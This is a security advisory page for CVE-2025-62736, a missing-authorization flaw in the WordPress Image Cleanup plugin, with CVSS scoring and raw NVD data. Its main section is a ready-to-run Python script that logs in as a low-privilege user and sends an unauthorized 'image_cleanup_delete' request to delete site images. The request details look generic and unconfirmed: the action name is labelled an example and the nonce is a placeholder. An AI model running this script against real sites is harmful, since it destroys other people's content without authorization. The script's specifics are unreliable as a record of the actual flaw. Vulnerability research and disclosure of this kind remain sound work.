Security Vulnerability Report
中文
CVE-2025-62736 CVSS 4.3 MEDIUM

CVE-2025-62736

Published: 2025-12-09 16:18:02
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in opicron Image Cleanup image-cleanup allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Image Cleanup: from n/a through <= 1.9.2.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

opicron Image Cleanup WordPress插件 <= 1.9.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62736 Image Cleanup Plugin Authorization Bypass PoC # Author: Security Researcher # Target: WordPress Image Cleanup Plugin <= 1.9.2 import requests import sys from urllib.parse import urlencode def exploit_cve_2025_62736(target_url, username, password): """ Exploit Missing Authorization in Image Cleanup plugin """ session = requests.Session() # Step 1: Login to WordPress with low-privilege account login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } print("[*] Logging in with low-privilege account...") response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed!") return False print("[+] Login successful!") # Step 2: Exploit the authorization bypass # Trigger image cleanup without proper authorization check exploit_url = f"{target_url}/wp-admin/admin-ajax.php" # Example: Delete images without admin privileges exploit_data = { 'action': 'image_cleanup_delete', 'attachment_id': '123', # Target attachment ID 'nonce': 'exploit' # Invalid or missing nonce should be checked } print("[*] Attempting to exploit authorization bypass...") response = session.post(exploit_url, data=exploit_data) if response.status_code == 200: print("[+] Exploit sent! Check if images were deleted.") print(f"[+] Response: {response.text}") else: print("[-] Exploit may have failed.") return True if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python {sys.argv[0]} http://example.com subscriber password123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_cve_2025_62736(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62736", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:02.357", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in opicron Image Cleanup image-cleanup allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Image Cleanup: from n/a through <= 1.9.2."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/image-cleanup/vulnerability/wordpress-image-cleanup-plugin-1-9-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}